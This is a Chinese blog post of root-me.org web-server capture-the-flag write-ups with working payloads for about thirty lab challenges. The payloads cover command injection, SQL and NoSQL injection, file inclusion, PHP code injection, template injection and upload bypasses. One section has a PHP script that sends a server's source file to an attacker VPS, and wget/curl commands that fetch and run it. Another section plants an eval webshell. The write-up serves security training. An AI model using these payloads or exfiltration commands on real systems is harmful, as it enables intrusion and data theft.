NEKO

root-me WEB-Server

2018/03/30

做题使我快乐

HTML

查看源代码即可

HTTP - Open redirect

redirect是跳转的意思,思路应该是抓包
随便打开一个链接后,用burp抓包
发现

1
GET /web-serveur/ch52/?url=https://slack.com&h=e52dc719664ead63be3d5066c135b6da HTTP/1.1

注意到h是url的md5值,让url=https://www.baidu.com,h=f9751de431104b125f48dd79cc55822a
发包过去就有flag了.

Command injection

命令注入
command1 && command2 先执行command1后执行command2
command1 | command2 只执行command2
command1 & command2 先执行command2后执行command1

payload:

1
2
127.0.0.1|(cat index.php)
然后查看源代码即可

Weak password

可以直接猜出来

1
2
username:admin
password:admin

也可以用hydra

1
hydra -L userList.txt -P passwordsList.txt challenge01.root-me.org  http-get /web-serveur/ch3/

User-agent

Wrong user-agent: you are not the "admin" browser!
用火狐的Modify Headers改下User-Agent头

再刷新下就有了
或者用burp改

back file

有备份文件index.php~

HTTP directory indexing

源码有个<!-- include("admin/pass.html") -->
进入http://challenge01.root-me.org/web-serveur/ch4/admin/pass.html
发现没什么东西
进入http://challenge01.root-me.org/web-serveur/ch4/admin
发现是个目录,在admin.txt里找到flag

HTTP Headers

burp发包看回应发现返回包里有一个Header-RootMe-Admin: none
发包的的时候在请求头里添加这一字段即可,有没有值都能拿到flag

HTTP verb tampering

常用HTTP请求:HEAD、GET、POST、PUT、DELETE、TRACE、OPTIONS、CONNECT
只要不是GET,POST请求即可,用PUT,DELETE等请求方式都能绕过http授权认证,实际上随便写个不存在的请求方式就能绕过。此处是NEKO(要大写).

1
2
3
4
5
6
NEKO /web-serveur/ch8/ HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close

Install files

phpbb是世界通用的一个cms
题目提示install
进目录:

1
http://challenge01.root-me.org/web-serveur/ch6/phpbb/install

发现install.php
在install.php里可以找到密码:karambar

Improper redirect

错误的重定向
用burp抓http://challenge01.root-me.org/web-serveur/ch32/的包,重放得到返回包,返回包里有flag。

或者直接

1
curl http://challenge01.root-me.org/web-serveur/ch32/

CRLF

CRLF攻击:
https://www.cnblogs.com/studyskill/p/6972576.html
这题主要是利用%0A换行来伪造日志。
正常情况是admin failed to authenticate.
通过提交

1
username=admin%20authenticated.%0aneko&password=123

达到

1
2
admin authenticated.
neko failed to authenticate.

的效果,flag就拿到了。

File upload - double extensions

apache解析漏洞
上传xxx.php.png即可
可以一句话也可以是大马
我用的大马

注意是根目录下的.passwd,upload里也有个.passwd的文件夹但里面是没有东西的。

File upload - MIME type

绕过类型比较
burp返回包里看到服务器是nginx
无法利用apache解析漏洞
这个题没检查文件后缀名,所以只要用burp改Content-Type: image/png即可上传,之后和上题一样。

HTTP cookies

Saved email adresses
burp抓包
将cookie改为ch7=admin即可

Directory traversal

目录遍历
galerie可以访问目录

1
http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=../

源码发现上层目录存在galerie和ch15.php

1
http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=../galerie/

源码发现galerie下的86hwnX2r目录
相同操作最后发现86hwnX2r目录下的password.txt

File upload - null byte

00截断,上传shell.php%00.png(这里%00不要用url解码,我也挺纳闷的),并改下type,服务端便只会解析shell.php,只要能访问shell.php就会给flag


访问http://challenge01.root-me.org/web-serveur/ch22/galerie/upload/qddq6jgg8s62lcqpkidann9r70/shell.php即可

php assert()

assert()可以执行php代码
发现page参数可控
访问

1
http://challenge01.root-me.org/web-serveur/ch47/?page=..

发现报错:

1
Warning: assert(): Assertion "strpos('includes/...php', '..') === false" failed in /challenge/web-serveur/ch47/index.php on line 8 Detected hacking attempt!

可以用代码注入来插入代码
payload:

1
http://challenge01.root-me.org/web-serveur/ch47/?page=','1') or system('ls -la') or strops('

闭合后代码为:

1
assert(strpos('includes/','1') or system('ls -la') or strops('.php','..')===false)

然后system(‘cat .passwd’)即可

PHP filters

filter伪协议读源码
读login.php发现包含config.php
读config.php源码发现password
payload:

1
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/read=convert.base64-encode/resource=config.php

PHP register globals

变量覆盖
index.php.bak泄露源码
判断函数:

1
2
3
4
5
if (( isset ($password) && $password!="" && auth($password,$hidden_password)==1) || (is_array($_SESSION) && $_SESSION["logged"]==1 ) ){
$aff=display("well done, you can validate with the password : $hidden_password");
} else {
$aff=display("try again");
}

有两种方式通过验证:1.密码验证 2.session验证
关键代码:

1
2
3
4
5
6
7
8
9
if (!ini_get('register_globals')) {
$superglobals = array($_SERVER, $_ENV,$_FILES, $_COOKIE, $_POST, $_GET);
if (isset($_SESSION)) {
array_unshift($superglobals, $_SESSION);
}
foreach ($superglobals as $superglobal) {
extract($superglobal, 0 );
}
}

先上payload:

1
http://challenge01.root-me.org/web-serveur/ch17/?_SESSION[logged]=1

$superglobals中会有

1
2
3
4
5
6
7
array(1) {
["_SESSION"]=>
array(1) {
["logged"]=>
string(1) "1"
}
}

经extract()变量覆盖后,已定义的变量中就会有:

1
2
3
4
5
["_SESSION"]=>
&array(1) {
["logged"]=>
string(1) "1"
}

满足判断条件。

1
2
3
if (isset($_SESSION)) {
array_unshift($superglobals, $_SESSION);
}

的作用是向$superglobals添加:

1
2
3
4
5
[0]=>
array(1) {
["logged"]=>
string(1) "1"
}

经extract()变量覆盖后就有了$logged=1,对于本题而言,貌似没什么软用。

Command injection - Filter bypass

命令执行,由于只回显Ping OK 或者Syntax Error 和NOK
选择用dnslog(http://ceye.io/records/http)测试命令是否执行
经测试当post(直接在框里写的话会把%再url编码一次,建议用hackbar的post功能)

1
ip=127.0.0.1 %0a curl http://ip.port.dmvara.ceye.io/`whoami`

时,会收到数据:

然而并没有执行命令,没办法用dnslog来读源码(可能我操作有问题)。
于是换了个思路:
在vps上放上shell.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
$address = '此处手动打码';
$service_port = 2333;

// 创建并返回一个套接字(通讯节点)
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false) {
echo "socket_create() failed, reason: ".socket_strerror(socket_last_error())."\n";
}

echo "Attempting to connect to '$address' on port '$service_port'...";
// 发起socket连接请求
$result = socket_connect($socket, $address, $service_port);
if($result === false) {
echo "socket_connect() failed, reason: ".socket_strerror(socket_last_error($socket))."\n";
} else {
echo "Connect success. \n";
}

$data=file_get_contents('index.php');


// 向socket服务器发送消息
socket_write($socket, $data, strlen($data));
echo "Client send success \n";


echo PHP_EOL;
socket_close($socket); // 关闭socket连接
?>

在vps上监听2333端口
然后post:

1
ip=127.0.0.1 %0a wget http://手动打码/shell.txt -O /tmp/neko.php %0a php /tmp/neko.php

vps上就会收到index的源码:

得到flag:Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!
尝试反弹shell,但一直瞬间断掉。

Local File Inclusion

结合右侧guest/admin的选项,我们知道有一个admin目录。
通过url特点,可以猜出路径是由files和f两个参数拼接而成,(当文件不存在时)由报错可知是用的file_get_contents()函数。
payload:

1
http://challenge01.root-me.org/web-serveur/ch16/?files=&f=../admin/index.php

Local File Inclusion - Double encoding

发现限制了/
通过提交/的双重url编码:

1
http://challenge01.root-me.org/web-serveur/ch45/index.php?page=contact%25%32%66

发现成功绕过,而且自动加上.inc.php的后缀名:

1
Warning: include(contact/.inc.php): failed to open stream: No such file or directory in /challenge/web-serveur/ch45/index.php on line 7

用filter伪协议读contact.inc.php的源码:

1
http://challenge01.root-me.org/web-serveur/ch45/index.php?page=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%32%25%36%35%25%36%31%25%36%34%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%34%25%36%31%25%36%33%25%37%34

在源码里发现了conf.inc.php的存在
继续读conf.inc.php发现flag

PHP - Loose Comparison

给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
function gen_secured_random() { // cause random is the way
$a = rand(1337,2600)*42;
$b = rand(1879,1955)*42;

$a < $b ? $a ^= $b ^= $a ^= $b : $a = $b;

return $a+$b;
}

function secured_hash_function($plain) { // cause md5 is the best hash ever
$secured_plain = sanitize_user_input($plain);
return md5($secured_plain);
}

function sanitize_user_input($input) { // cause someone told me to never trust user input
$re = '/[^a-zA-Z0-9]/';
$secured_input = preg_replace($re, "", $input);
return $secured_input;
}

if (isset($_GET['source'])) {
show_source(__FILE__);
die();
}


require_once "secret.php";

if (isset($_POST['s']) && isset($_POST['h'])) {
$s = sanitize_user_input($_POST['s']);
$h = secured_hash_function($_POST['h']);
$r = gen_secured_random();
if($s != false && $h != false) {
if($s.$r == $h) {
print "Well done! Here is your flag: ".$flag;
}
else {
print "Fail...";
}
}
else {
print "<p>Hum ...</p>";
}
}
?>

逻辑很简单,弱比较。
搜一下0e开头的md5值
post:
s=0e&h=s155964671a

PHP preg_replace()

查看目录文件:
preg_replace()的/e修饰符执行代码漏洞。

1
search=/neko/e&replace=print_r(scandir(getcwd()))&content=neko

结果:

1
2
3
4
5
6
7
8
9
10
Array
(
[0] => .
[1] => ..
[2] => ._nginx.http-level.inc
[3] => ._nginx.server-level.inc
[4] => ._php53-fpm.pool.inc
[5] => flag.php
[6] => index.php
)

查看flag.php:

1
search=/neko/e&replace=show_source('flag.php')&content=neko

flag:pr3g_r3pl4c3_3_m0d1f13r_styl3

PHP type juggling

给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 <?php

// $FLAG, $USER and $PASSWORD_SHA256 in secret file
require("secret.php");

// show my source code
if(isset($_GET['source'])){
show_source(__FILE__);
die();
}

$return['status'] = 'Authentication failed!';
if (isset($_POST["auth"])) {
// retrieve JSON data
$auth = @json_decode($_POST['auth'], true);

// check login and password (sha256)
if($auth['data']['login'] == $USER && !strcmp($auth['data']['password'], $PASSWORD_SHA256)){
$return['status'] = "Access granted! The validation password is: $FLAG";
}
}
print json_encode($return);

$auth['data']['login'] == $USER可以用0==’a’的php弱比较绕过,strcmp()可以传入数组使其返回NULL

payload:

1
2
3
{"data":{"login":0,"password":["123","456"]}}
经url编码后:
%7b%22data%22%3a%7b%22login%22%3a0%2c%22password%22%3a%5b%22123%22%2c%22456%22%5d%7d%7d

url编码转换:http://tool.chinaz.com/tools/urlencode.aspx

Remote File Inclusion

访问:

1
http://challenge01.root-me.org/web-serveur/ch13/?lang=test

回显:

1
Warning: include(test_lang.php):

可以看到加上了_lang.php的后缀。
可以用?屏蔽后面的后缀,也可以用%23a
在vps上放上neko.txt:

1
2
3
<?php
eval($_POST['neko']);
?>

访问:

1
http://challenge01.root-me.org/web-serveur/ch13/?lang=http://打码/neko.txt?

相当于访问:

1
http://challenge01.root-me.org/web-serveur/ch13/?lang=http://打码/neko.txt?_lang.php

这样_lang.php就被当做一个无效的get参数。
post:
neko=print_r(show_source('index.php'));
源码中得到flag
(这里vps上不能放置neko.php,这样包含的话是在vps上执行代码)

看了一个方法,真的是6:

1
http://challenge01.root-me.org/web-serveur/ch13/?lang=data://text/plain;base64,PD9waHANCiRob21lcGFnZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdpbmRleC5waHAnKTsNCmVjaG8gJGhvbWVwYWdlOw0KPz4=

查看源码就能看到index.php的源码

Server-side Template Injection

服务端模板注入攻击 (SSTI)自动攻击脚本:https://github.com/epinna/tplmap

1
python2 tplmap.py -u http://challenge01.root-me.org/web-serveur/ch41/check -d "nickname=john" --os-shell

getshell:

1
2
3
4
5
6
7
8
9
10
[+] Run commands on the operating system.
Linux $ ls
pom.xml
SECRET_FLAG.txt
src
target
webapp
Linux $ cat SECRET_FLAG.txt
B3wareOfT3mplat3Inj3ction
Linux $

SQL injection - authentication

1
2
3
login=admin' /* &password=1
login=admin' -- &password=1
login=admin&password=' or (1 and username='admin') and '1

注意– 后有个空格
源代码查看password的value.

SQL injection - authentication - GBK

宽字节注入

1
login=%df%27 or 1-- &password=1

注意– 后有个空格

SQL injection - string

在搜索界面找到string注入点
判断几列:

1
recherche=123' group by 1,2,3,4,5,6 -- -

爆表:

1
recherche=123' union select 1,name from sqlite_master -- -

爆列(通过查询sql字段):

1
recherche=123' union select 1,sql from sqlite_master -- -

爆内容:

1
recherche=123' union select username,password from users -- -

NoSQL injection - authentication

网上找的wp

1
2
3
4
5
6
7
8
9
10
11
12
First Solution:
http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=^f.*$&pass[$ne]=1

Seconde Solution:
http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=\S{4}&pass[$ne]=1 //login as test
http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=\S{5}&pass[$ne]=1 //login as admin
http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=\S{6}&pass[$ne]=1 //login as flag{nosqli_no_secret_4_you}

Third Solution:
http://challenge01.root-me.org/web-serveur/ch38/?login[$ne]=1&pass[$ne]=1 //reveals admin
http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=[^admin]$&pass[$ne]=1 //reveals test
http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=[^admin|test]$&pass[$ne]=1 //reveals flag{nosqli_no_secret_4_you}

原文作者: n3k0

发表日期: March 30th 2018, 1:26:42

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. HTML
  2. 2. HTTP - Open redirect
  3. 3. Command injection
  4. 4. Weak password
  5. 5. User-agent
  6. 6. back file
  7. 7. HTTP directory indexing
  8. 8. HTTP Headers
  9. 9. HTTP verb tampering
  10. 10. Install files
  11. 11. Improper redirect
  12. 12. CRLF
  13. 13. File upload - double extensions
  14. 14. File upload - MIME type
  15. 15. HTTP cookies
  16. 16. Directory traversal
  17. 17. File upload - null byte
  18. 18. php assert()
  19. 19. PHP filters
  20. 20. PHP register globals
  21. 21. Command injection - Filter bypass
  22. 22. Local File Inclusion
  23. 23. Local File Inclusion - Double encoding
  24. 24. PHP - Loose Comparison
  25. 25. PHP preg_replace()
  26. 26. PHP type juggling
  27. 27. Remote File Inclusion
  28. 28. Server-side Template Injection
  29. 29. SQL injection - authentication
  30. 30. SQL injection - authentication - GBK
  31. 31. SQL injection - string
  32. 32. NoSQL injection - authentication